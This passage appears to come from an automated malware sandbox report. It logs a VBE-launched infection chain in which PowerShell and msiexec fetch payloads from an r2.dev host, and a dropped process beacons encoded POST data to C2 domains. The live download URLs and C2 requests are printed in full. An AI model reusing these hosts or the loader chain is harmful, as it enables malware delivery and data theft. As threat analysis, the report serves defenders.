Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
Oct 5, 2024 14:51:15.879343033 CEST  1236               IN         Data Raw: 73 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 3d 77
Data Ascii: sync></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","UA-26575989-44")</script><nav class="navbar navbar-inverse"><div class=container-fluid style="padding:0 32
Oct 5, 2024 14:51:15.879360914 CEST  1236               IN         Data Raw: 6f 67 69 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 6e 61 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 65 6d 70 74 79 2d 61 63 63 6f 75 6e 74 2d 70 61 67 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6e 74 61
Data Ascii: ogin</a></li></ul></div></div></nav><div class=empty-account-page><div class=container><div class="col-xs-12 top-container"><div class=message><h2 id=pathName><i></i></h2><div class=message-subtitle>Happy to see your domain with Hostinger!</di
Oct 5, 2024 14:51:15.879380941 CEST  1236               IN         Data Raw: 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f 65 6e 2f 61 72 74 69 63 6c 65 73 2f 31 35 38 33 32 31 34 2d 68 6f 77 2d 74 6f 2d 61 64 64 2d 61 2d 64 6f 6d 61 69 6e 2d 74 6f 2d 6d 79 2d 61 63 63 6f 75 6e 74 2d 68 6f 77 2d 74 6f 2d
Data Ascii: upport.hostinger.com/en/articles/1583214-how-to-add-a-domain-to-my-account-how-to-add-website rel=nofollow>Add a website</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Change
Oct 5, 2024 14:51:15.879411936 CEST  104                IN         Data Raw: 68 2e 66 6c 6f 6f 72 28 72 2f 37 30 30 29 3a 72 3e 3e 31 2c 72 2b 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 65 29 2c 74 3d 30 3b 34 35 35 3c 72 3b 74 2b 3d 6f 29 72 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 33 35 29 3b 72 65 74 75 72 6e 20 4d 61
Data Ascii: h.floor(r/700):r>>1,r+=Math.floor(r/e),t=0;455<r;t+=o)r=Math.floor(r/35);return Math.floor(t+36*r/(r+38)
Oct 5, 2024 14:51:15.879599094 CEST  1236               IN         Data Raw: 29 7d 74 68 69 73 2e 64 65 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 61 2c 68 2c 66 2c 69 2c 63 2c 75 2c 64 2c 6c 2c 70 2c 67 2c 73 2c 43 2c 77 2c 76 2c 6d 3d 5b 5d 2c 79 3d 5b 5d 2c 45 3d 65 2e 6c 65 6e 67 74 68 3b 66
Data Ascii: )}this.decode=function(e,t){var a,h,f,i,c,u,d,l,p,g,s,C,w,v,m=[],y=[],E=e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal input
Oct 5, 2024 14:51:15.879612923 CEST  224                IN         Data Raw: 28 6d 2d 39 37 3c 32 36 29 3c 3c 35 29 2b 28 28 21 77 5b 64 5d 26 26 6d 2d 36 35 3c 32 36 29 3c 3c 35 29 29 3a 74 5b 64 5d 29 29 3b 66 6f 72 28 69 3d 63 3d 79 2e 6c 65 6e 67 74 68 2c 30 3c 63 26 26 79 2e 70 75 73 68 28 22 2d 22 29 3b 69 3c 76 3b
Data Ascii: (m-97<26)<<5)+((!w[d]&&m-65<26)<<5)):t[d]));for(i=c=y.length,0<c&&y.push("-");i<v;){for(l=r,d=0;d<v;++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,
Oct 5, 2024 14:51:15.879645109 CEST  760                IN         Data Raw: 64 3d 30 3b 64 3c 76 3b 2b 2b 64 29 7b 69 66 28 28 43 3d 74 5b 64 5d 29 3c 68 26 26 2b 2b 66 3e 72 29 72 65 74 75 72 6e 20 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72 66 6c 6f 77 28 32 29 22 29 3b 69 66 28 43 3d 3d 68 29 7b 66 6f
Data Ascii: d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g<=u?1:u+26<=g?26:g-u));g+=o)y.push(String.fromCharCode(e(s+(p-s)%(o-s),0))),p=Math.floor((p-s)/(o-s));y.push(String.fromCharCode(e(p,a&&w[d]?1:


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.4  50005        84.32.84.32     80                1696  C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 5, 2024 14:51:31.031192064 CEST  609                OUT        POST /7z6q/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.casesrep.site
Origin: http://www.casesrep.site
Connection: close
Cache-Control: max-age=0
Content-Length: 202
Content-Type: application/x-www-form-urlencoded
Referer: http://www.casesrep.site/7z6q/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Data Raw: 5a 70 70 78 50 3d 65 4a 66 39 6f 48 56 4e 59 53 50 46 68 45 68 39 66 73 6c 76 30 71 34 4f 65 7a 38 78 4a 45 51 7a 51 52 73 66 51 44 6b 52 74 37 68 77 59 66 33 41 66 50 44 59 74 7a 77 62 6c 33 56 47 52 46 46 30 6f 73 43 6e 58 5a 46 67 4a 6d 6a 2b 41 57 48 69 70 58 63 45 46 4e 7a 42 65 59 7a 6d 45 57 76 79 55 73 52 7a 43 44 43 48 50 45 48 67 77 4c 4f 32 4d 57 4b 61 72 52 4c 2b 59 6f 55 39 67 70 6e 36 32 35 66 38 6b 54 33 4d 67 55 6e 7a 79 32 47 71 42 71 72 59 35 33 56 79 39 66 42 45 4e 4a 77 58 35 4c 57 6f 52 4e 6e 6e 51 47 73 70 64 72 4a 64 6c 55 48 32 6c 50 71 2f 32 4c 4a 57 4d 39 56 54 69 51 3d 3d
Data Ascii: ZppxP=eJf9oHVNYSPFhEh9fslv0q4Oez8xJEQzQRsfQDkRt7hwYf3AfPDYtzwbl3VGRFF0osCnXZFgJmj+AWHipXcEFNzBeYzmEWvyUsRzCDCHPEHgwLO2MWKarRL+YoU9gpn625f8kT3MgUnzy2GqBqrY53Vy9fBENJwX5LWoRNnnQGspdrJdlUH2lPq/2LJWM9VTiQ==


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.4  50006        84.32.84.32     80                1696  C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 5, 2024 14:51:33.612529993 CEST  629                OUT        POST /7z6q/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.casesrep.site
Origin: http://www.casesrep.site
Connection: close
Cache-Control: max-age=0
Content-Length: 222
Content-Type: application/x-www-form-urlencoded
Referer: http://www.casesrep.site/7z6q/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Data Raw: 5a 70 70 78 50 3d 65 4a 66 39 6f 48 56 4e 59 53 50 46 6a 6b 52 39 54 72 78 76 7a 4b 34 42 64 7a 38 78 41 6b 51 2f 51 51 51 66 51 42 49 42 74 70 56 77 62 2b 48 41 63 4f 44 59 75 7a 77 62 71 58 55 4e 4d 56 46 6a 6f 73 4f 65 58 59 35 67 4a 6d 6e 2b 41 58 33 69 70 45 6b 48 58 4e 7a 50 48 49 7a 6b 4a 32 76 79 55 73 52 7a 43 44 57 74 50 45 66 67 77 62 2b 32 65 33 4b 5a 69 78 4c 35 49 59 55 39 74 4a 6e 2b 32 35 66 6b 6b 53 72 31 67 57 66 7a 79 7a 69 71 42 37 72 62 77 33 56 6f 6a 76 41 6f 4b 35 4d 65 68 59 7a 6f 62 39 50 56 50 48 56 4a 63 74 59 48 30 6c 6d 68 33 50 4f 4d 72 4d 41 69 42 2b 6f 61 35 61 65 2b 41 44 41 4a 2b 41 45 37 6b 6e 4a 68 36 36 34 52 2b 44 55 3d
Data Ascii: ZppxP=eJf9oHVNYSPFjkR9TrxvzK4Bdz8xAkQ/QQQfQBIBtpVwb+HAcODYuzwbqXUNMVFjosOeXY5gJmn+AX3ipEkHXNzPHIzkJ2vyUsRzCDWtPEfgwb+2e3KZixL5IYU9tJn+25fkkSr1gWfzyziqB7rbw3VojvAoK5MehYzob9PVPHVJctYH0lmh3POMrMAiB+oa5ae+ADAJ+AE7knJh664R+DU=


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.4  50007        84.32.84.32     80                1696  C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 5, 2024 14:51:36.174041986 CEST  10711              OUT        POST /7z6q/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.casesrep.site
Origin: http://www.casesrep.site
Connection: close
Cache-Control: max-age=0
Content-Length: 10302
Content-Type: application/x-www-form-urlencoded
Referer: http://www.casesrep.site/7z6q/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Data Raw: 5a 70 70 78 50 3d 65 4a 66 39 6f 48 56 4e 59 53 50 46 6a 6b 52 39 54 72 78 76 7a 4b 34 42 64 7a 38 78 41 6b 51 2f 51 51 51 66 51 42 49 42 74 70 4e 77 59 49 62 41 65 70 66 59 67 54 77 62 6a 33 55 4f 4d 56 46 69 6f 73 48 57 58 59 31 77 4a 6b 50 2b 42 31 2f 69 34 46 6b 48 4e 64 7a 50 61 59 7a 6c 45 57 76 6e 55 74 39 76 43 44 47 74 50 45 66 67 77 59 6d 32 49 57 4b 5a 67 78 4c 2b 59 6f 55 50 67 70 6e 47 32 35 58 65 6b 54 66 6c 67 6d 2f 7a 78 53 65 71 4f 70 44 62 37 33 56 75 69 76 41 77 4b 35 42 47 68 59 76 65 62 39 4b 49 50 48 78 4a 66 73 31 6b 67 6c 69 41 6b 74 36 78 36 39 74 59 41 76 41 2f 77 71 61 4a 45 67 63 71 6a 69 49 56 2b 55 77 31 70 49 63 4c 70 31 30 68 58 73 2f 70 39 5a 58 36 69 71 69 5a 51 64 53 64 51 79 6d 65 78 51 74 6f 63 52 37 4f 68 48 4e 44 69 61 34 4e 36 41 54 64 6e 53 79 42 75 54 38 31 53 4e 2b 6e 4f 54 66 6d 51 78 49 72 2b 4f 74 48 6c 76 30 50 30 41 51 6a 43 58 34 73 54 4f 2b 4a 6e 79 4a 6f 46 5a 49 64 79 76 4f 30 46 57 47 63 39 69 4b 4c 78 50 64 49 75 5a 2f 55 57 6c 37 55 66 56 4b 44 [TRUNCATED]
Data Ascii: ZppxP= [TRUNCATED]


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.45000884.32.84.32801696C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 5, 2024 14:51:38.715034008 CEST338OUTGET /7z6q/?ZppxP=TL3drwoENxP57Dd5dOFmv/YKWz0ccyhnGCQdWwUu3IMTL8D4S+Gi1DMSnGJbZzhysdvLIJdHJUOvGXStrAsLXN7Ufb7PIiPGRqZTCzOmV2/ygr+YHVnslTQ=&-Ly=tZ6DMnK HTTP/1.1
                                          Accept: */*
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.casesrep.site
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
                                          Oct 5, 2024 14:51:39.172595024 CEST1236INHTTP/1.1 200 OK
                                          Server: hcdn
                                          Date: Sat, 05 Oct 2024 12:51:39 GMT
                                          Content-Type: text/html
                                          Content-Length: 10072
                                          Connection: close
                                          Vary: Accept-Encoding
                                          alt-svc: h3=":443"; ma=86400
                                          x-hcdn-request-id: 775bd875b6df18080c76fc97bdfc9aed-bos-edge4
                                          Expires: Sat, 05 Oct 2024 12:51:38 GMT
                                          Cache-Control: no-cache
                                          Accept-Ranges: bytes
                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                          Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                          Oct 5, 2024 14:51:39.172616959 CEST | 1236 | IN | Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                          Oct 5, 2024 14:51:39.172629118 CEST | 1236 | IN | Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                          Oct 5, 2024 14:51:39.172637939 CEST | 672 | IN | Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                          Oct 5, 2024 14:51:39.172648907 CEST | 1236 | IN | Data Ascii: sync></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","UA-26575989-44")</script><nav class="navbar navbar-inverse"><div class=container-fluid style="padding:0 32
                                          Oct 5, 2024 14:51:39.172660112 CEST | 1236 | IN | Data Ascii: ogin</a></li></ul></div></div></nav><div class=empty-account-page><div class=container><div class="col-xs-12 top-container"><div class=message><h2 id=pathName><i></i></h2><div class=message-subtitle>Happy to see your domain with Hostinger!</di
                                          Oct 5, 2024 14:51:39.172671080 CEST | 1236 | IN | Data Ascii: upport.hostinger.com/en/articles/1583214-how-to-add-a-domain-to-my-account-how-to-add-website rel=nofollow>Add a website</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Change
                                          Oct 5, 2024 14:51:39.172681093 CEST | 1236 | IN | Data Ascii: h.floor(r/700):r>>1,r+=Math.floor(r/e),t=0;455<r;t+=o)r=Math.floor(r/35);return Math.floor(t+36*r/(r+38))}this.decode=function(e,t){var a,h,f,i,c,u,d,l,p,g,s,C,w,v,m=[],y=[],E=e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c
                                          Oct 5, 2024 14:51:39.172694921 CEST | 1088 | IN | Data Ascii: ]=t[d]!=w[d];var m,y=[];for(h=128,u=72,d=f=0;d<v;++d)t[d]<128&&y.push(String.fromCharCode(w?(m=t[d],(m-=(m-97<26)<<5)+((!w[d]&&m-65<26)<<5)):t[d]));for(i=c=y.length,0<c&&y.push("-");i<v;){for(l=r,d=0;d<v;++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          5 | 192.168.2.4 | 50009 | 38.55.251.233 | 80 | 1696 | C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Oct 5, 2024 14:51:45.038877964 CEST | 618 | OUT | POST /80e1/ HTTP/1.1
                                          Accept: */*
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.kuaimaolife.shop
                                          Origin: http://www.kuaimaolife.shop
                                          Connection: close
                                          Cache-Control: max-age=0
                                          Content-Length: 202
                                          Content-Type: application/x-www-form-urlencoded
                                          Referer: http://www.kuaimaolife.shop/80e1/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
                                          Data Ascii: ZppxP=VhgCfoNNlYCtwhcVVi4yM6hf8WPhlFUAS4s35kb5RQLqscfvqiaTIaSt7WHm5PHO33l7XvUgewwr7Lbv4YGn9+MTfa3VT56iziV0pzecw6ejh0JeMBydUqfdP7c+tudXEyAe2PG+Or3Whg5WlO+UjMNFTTGcPUK/OvfIVggCkV726BNmSdea83tJ+CLGkgXOcw==
                                          Oct 5, 2024 14:51:45.818104982 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 12:51:45 GMT
                                          Content-Type: text/html
                                          Content-Length: 146
                                          Connection: close
                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          6 | 192.168.2.4 | 50010 | 38.55.251.233 | 80 | 1696 | C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Oct 5, 2024 14:51:47.599777937 CEST | 638 | OUT | POST /80e1/ HTTP/1.1
                                          Accept: */*
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.kuaimaolife.shop
                                          Origin: http://www.kuaimaolife.shop
                                          Connection: close
                                          Cache-Control: max-age=0
                                          Content-Length: 222
                                          Content-Type: application/x-www-form-urlencoded
                                          Referer: http://www.kuaimaolife.shop/80e1/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
                                          Data Ascii: ZppxP=VhgCfoNNlYCtqBsVSD4yKahc/WPhulVLS5Q35gikRmbqv+HvrgiTLaStz2Hj3vGj33pzXqsgexUr7JTv4ruk+OMNKq3bdZ6iziV0pwi2w5ujgHReLTKadKfabrc+gOdTEyA42LGYOp/WhgJWmdmV08NPODHZEFK7I6uILA0gknmT7Hc8Ds/Nu3J6jFCypjqHHxc+jPe9Nr59l71KMfB2BTE=
                                          Oct 5, 2024 14:51:48.442344904 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 12:51:48 GMT
                                          Content-Type: text/html
                                          Content-Length: 146
                                          Connection: close
                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          0 | 192.168.2.4 | 49730 | 162.159.140.237 | 443 | 1068 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-10-05 12:49:47 UTC | 198 | OUT | GET /nedkoge.mso HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                          Host: pub-2f7d07153ea1403184d62266d9c28e41.r2.dev
                                          Connection: Keep-Alive
                                          2024-10-05 12:49:47 UTC | 259 | IN | HTTP/1.1 200 OK
                                          Date: Sat, 05 Oct 2024 12:49:47 GMT
                                          Content-Length: 482916
                                          Connection: close
                                          Accept-Ranges: bytes
                                          ETag: "06cff17e73868fbb3a7a3c648c95a7bb"
                                          Last-Modified: Fri, 04 Oct 2024 09:22:48 GMT
                                          Server: cloudflare
                                          CF-RAY: 8cdd889f4a017285-EWR


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          1 | 192.168.2.4 | 49737 | 162.159.140.237 | 443 | 1852 | C:\Windows\SysWOW64\msiexec.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-10-05 12:50:24 UTC | 205 | OUT | GET /BEkfITzYaj231.bin HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                          Host: pub-2f7d07153ea1403184d62266d9c28e41.r2.dev
                                          Cache-Control: no-cache
                                          2024-10-05 12:50:25 UTC | 299 | IN | HTTP/1.1 200 OK
                                          Date: Sat, 05 Oct 2024 12:50:25 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 286272
                                          Connection: close
                                          Accept-Ranges: bytes
                                          ETag: "15e5e91f3a1b37aef1f1b7710db76e3f"
                                          Last-Modified: Fri, 04 Oct 2024 09:10:11 GMT
                                          Server: cloudflare
                                          CF-RAY: 8cdd8989aa8a4376-EWR
                                          2024-10-05 12:50:25 UTC1369INData Raw: 11 0c d0 51 7a 58 a7 30 2a 14 37 da 62 dc eb 45 9e 55 57 26 b3 23 2a 8f 69 6a 83 47 28 e2 c8 d9 23 86 ad 01 6b 74 b0 59 dd 61 15 4e f7 ad 84 3a e5 76 a2 fb 7b 37 df 57 87 0f b5 20 0e a7 ec 91 7d da 81 8d f3 0a d6 7e 06 0d 6a d6 79 cf e2 ca 0b 73 6f 10 ac 25 41 9f 4d ed ef 80 5c e9 c4 24 66 37 cd 86 12 8b a9 d6 fa 3b d0 d0 86 64 73 37 e6 ea 71 57 b7 5c eb 68 89 0f b6 f3 0c 1d 4e da 84 57 61 75 ef ca 99 82 0e c4 e2 9e 56 37 07 26 dc 46 b0 93 73 5d 30 ef 9b 48 6a 47 50 c2 a2 a4 f7 a5 e1 78 d2 af 5d 1f 50 62 cc b6 6b 03 8e 0f 5e d5 e8 cf 79 5b d0 fa 45 a9 f0 e3 43 17 59 ed 41 02 62 27 c9 20 6d 6a 17 bf d4 e3 d8 01 48 bf 14 95 fb 42 d8 85 9a 87 99 8c b1 ca dc ea 4d b7 f5 6e 29 bf da e8 87 55 5f fa e0 aa 89 4b 1f ca 4e 18 8d d2 2d 91 2e d7 17 fa 71 32 b3 8f 8b
                                          Data Ascii: QzX0*7bEUW&#*ijG(#ktYaN:v{7W }~jyso%AM\$f7;ds7qW\hNWauV7&Fs]0HjGPx]Pbk^y[ECYAb' mjHBMn)U_KN-.q2
                                          2024-10-05 12:50:25 UTC1369INData Raw: 56 13 6f 63 ed 0a 67 04 37 77 53 23 f4 34 4e 73 0e 1b 70 8a 70 2b 8f 10 29 f2 e3 e1 74 cc a4 48 62 15 51 7a a7 d8 11 46 7d a2 bc fe eb c7 7e 7f 73 d3 55 b9 fe 54 3b 6f 59 33 a3 87 d3 b8 d0 82 f4 03 01 ca fa 15 65 f0 8a 55 1a c2 c4 f7 b7 2e 35 fc bf a5 60 c2 b8 d7 ae 85 20 ce b6 06 dd d1 3e d4 21 96 9f f9 4b 0c 2a c3 44 99 a3 7f 45 65 7c b7 eb 87 d8 68 55 03 35 d6 06 c4 61 ce 48 b2 49 da 19 cf 3c 5b 8e 70 d1 1b c7 c9 b1 d1 54 52 63 e9 86 60 e4 65 09 35 57 c3 0e 69 99 74 59 08 e4 2e 3e 95 22 1c 75 c1 93 9d 18 a4 b6 c6 57 95 8a 7a ce 81 8b af 8c a5 68 b4 3d 7c ae 4a 09 2c 41 5c 20 93 43 6c 53 30 e4 1a 88 16 46 7f 21 8c fc 8a a8 36 bd 71 13 dc a7 8d 1f 60 e3 cd 19 0d 26 46 36 49 d4 97 2f f1 d5 ea 0f 2a f2 7f ce 94 4a 1c 07 ff bc 1d 8b 03 b8 e2 cc 69 6e fb 61
                                          Data Ascii: Vocg7wS#4Nspp+)tHbQzF}~sUT;oY3eU.5` >!K*DEe|hU5aHI<[pTRc`e5WitY.>"uWzh=|J,A\ ClS0F!6q`&F6I/*Jina


                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:0
                                          Start time:08:49:41
                                          Start date:05/10/2024
                                          Path:C:\Windows\System32\wscript.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Narudzba ACH0036173.vbe"
                                          Imagebase:0x7ff7cbbf0000
                                          File size:170'496 bytes
                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:1
                                          Start time:08:49:41
                                          Start date:05/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd.exe /c ping 6777.6777.6777.677e
                                          Imagebase:0x7ff616570000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:2
                                          Start time:08:49:41
                                          Start date:05/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:3
                                          Start time:08:49:42
                                          Start date:05/10/2024
                                          Path:C:\Windows\System32\PING.EXE
                                          Wow64 process (32bit):false
                                          Commandline:ping 6777.6777.6777.677e
                                          Imagebase:0x7ff7f0000000
                                          File size:22'528 bytes
                                          MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:4
                                          Start time:08:49:42
                                          Start date:05/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
